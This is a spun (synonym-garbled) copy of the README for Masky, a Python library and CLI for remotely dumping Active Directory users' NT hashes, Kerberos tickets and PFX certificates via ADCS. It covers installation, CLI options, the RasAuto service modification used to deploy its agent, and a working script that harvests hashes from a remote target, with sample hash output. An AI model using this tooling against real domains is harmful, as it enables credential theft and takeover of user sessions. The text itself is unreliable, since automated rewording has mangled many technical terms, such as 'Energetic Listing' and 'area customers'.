Masky is a python library offering an alternate approach to remotely dump area customers’ credentials due to an ADCS. A command line software has been constructed on high of this library to be able to simply collect PFX, NT hashes and TGT on a bigger scope.
This software doesn’t exploit any new vulnerability and doesn’t work by dumping the LSASS course of reminiscence. Certainly, it solely takes benefit of reliable Home windows and Energetic Listing options (token impersonation, certificates authentication by way of kerberos & NT hashes retrieval by way of PKINIT). A weblog publish was revealed to element the applied technics and the way Masky works.
Masky supply code is essentially primarily based on the wonderful Certify and Certipy instruments. I actually thanks their authors for the researches concerning offensive exploitation technics in opposition to ADCS (see. Acknowledgments part).
Set up
Masky python3 library and its related CLI may be merely put in by way of the general public PyPi repository as following:
The Masky agent executable is already included throughout the PyPi bundle.
Furthermore, if that you must modify the agent, the C# code may be recompiled by way of a Visible Studio mission situated in agent/Masky.sln. It will requires .NET Framework 4 to be constructed.
Utilization
Masky has been designed as a Python library. Furthermore, a command line interface was created on high of it to ease its utilization throughout pentest or RedTeam actions.
For each usages, you want first to retrieve the FQDN of a CA server and its CA identify deployed by way of an ADCS. This data may be simply retrieved by way of the certipy discover choice or by way of the Microsoft built-in certutil.exe software. Guarantee that the default Person template is enabled on the focused CA.
Warning: Masky deploys an executable on every goal by way of a modification of the present RasAuto service. Regardless of the automated roll-back of its intial ImagePath worth, an surprising error throughout Masky runtime may skip the cleanup part. Due to this fact, don’t forget to manually reset the unique worth in case of such undesirable cease.
Command line
The next demo reveals a fundamental utilization of Masky by focusing on 4 distant methods. Its execution permits to gather NT hashes, CCACHE and PFX of three distincts area customers from the sec.lab testing area.
Masky additionally supplies choices which are generally offered by such instruments (thread quantity, authentication mode, targets loaded from recordsdata, and so on. ).
__ __ _
| / | __ _ ___| | ___ _
| |/| |/ _` / __| |/ / | | |
| | | | (_| __ <| |_| |
|_| |_|__,_|___/_|___, |
v0.0.3 |___/utilization: Masky [-h] [-v] [-ts] [-t THREADS] [-d DOMAIN] [-u USER] [-p PASSWORD] [-k] [-H HASHES] [-dc-ip ip address] -ca CERTIFICATE_AUTHORITY [-nh] [-nt] [-np] [-o OUTPUT]
[targets ...]
positional arguments:
targets Targets in CIDR, hostname and IP codecs are accepted, from a file or not
choices:
-h, --help present this assist message and exit
-v, --verbose Allow debugging messages
-ts, --timestamps Show timestamps for every log
-t THREADS, --threads THREADS
Threadpool measurement (max 15)
Authentication:
-d DOMAIN, --domain DOMAIN
Area identify to authenticate to
-u USER, --user USER Username to au thenticate with
-p PASSWORD, --password PASSWORD
Password to authenticate with
-k, --kerberos Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) primarily based on course parameters.
-H HASHES, --hashes HASHES
Hashes to authenticate with (LM:NT, :NT or :LM)
Connection:
-dc-ip ip handle IP Tackle of the area controller. If omitted it's going to use the area half (FQDN) specified within the goal parameter
-ca CERTIFICATE_AUTHORITY, --certificate-authority CERTIFICATE_AUTHORITY
Certificates Authority Title (SERVERCA_NAME)
Outcomes:
-nh, --no-hash Don't request NT hashes
-nt, --no-ccache Don't save ccache recordsdata
-np, --no-pfx Don't save pfx recordsdata
-o OUTPUT, --output OUTPUT
Native path to a folder the place Masky outcomes might be saved (robotically creates the folde r if it doesn't exit)
Python library
Under is an easy script utilizing the Masky library to gather secrets and techniques of operating area consumer periods from a distant goal.
from masky import Masky
from getpass import getpassdef dump_nt_hashes():
# Outline the authentication parameters
ca = "srv-01.sec.labsec-SRV-01-CA"
dc_ip = "192.168.23.148"
area = "sec.lab"
consumer = "askywalker"
password = getpass()
# Create a Masky occasion with these credentials
m = Masky(ca=ca, consumer=consumer, dc_ip=dc_ip, area=area, password=password)
# Set a goal and run Masky in opposition to it
goal = "192.168.23.130"
rslts = m.run(goal)
# Test if Masky succesfully hijacked at the very least a consumer session
# or if an surprising error occured
if not rslts:
return False
# Loop on MaskyResult object to show hijacked customers and to retreive their NT hashes
print(f"Outcomes from hostname: {rslts.hostname}")
for consumer in rslts.customers:
print(f"t - {consumer.area}{consumer.n ame} - {consumer.nt_hash}")
return True
if __name__ == "__main__":
dump_nt_hashes()
Its execution generate the next output.
$> python3 .masky_demo.py
Password:
Outcomes from hostname: SRV-01
- sechsolo - 05ff4b2d523bc5c21e195e9851e2b157
- secaskywalker - 8928e0723012a8471c0084149c4e23b1
- secadministrator - 4f1c6b554bb79e2ce91e012ffbe6988a
A MaskyResults object containing an inventory of Person objects is returned after a profitable execution of Masky.
Please take a look at the maskylibresults.py module to examine the strategies and attributes offered by these two lessons.
Acknowledgments
